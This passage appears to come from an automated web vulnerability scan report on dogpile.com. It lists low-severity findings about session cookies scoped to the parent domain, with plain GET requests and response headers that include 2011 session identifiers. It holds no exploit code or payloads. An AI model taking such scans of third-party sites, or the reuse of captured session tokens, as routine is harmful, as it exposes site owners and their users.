Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=87f215cdd6a246a69870c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:52 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:52 GMT
Connection: close
Content-Length: 42015
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.57. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/faq/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/faq/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=3f9553d8ae70430197ccc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:39 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:39 GMT
Connection: close
Content-Length: 64467
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.58. http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=c1eb80fd75d841fcb438c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:54 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:54 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:54 GMT
Connection: close
Content-Length: 43755
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.59. http://www.dogpile.com/dogpile_rss/ws/index/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/index/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/index/?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:08:30 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=efab2d4d5b684fe9b96cc16a3af0cb01&ActionId=fc23be7bf89f4d2eac78c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=50b69dc71f5b4e528b29c16a3af0cb01&ActionId=e35e7644240d4a61a75ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:29:12 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:12 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:09:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:09:12 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.60. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/index/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/index/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d5d171eb7a7b49f68a6ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:57 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:57 GMT
Connection: close
Content-Length: 45807
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.61. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain: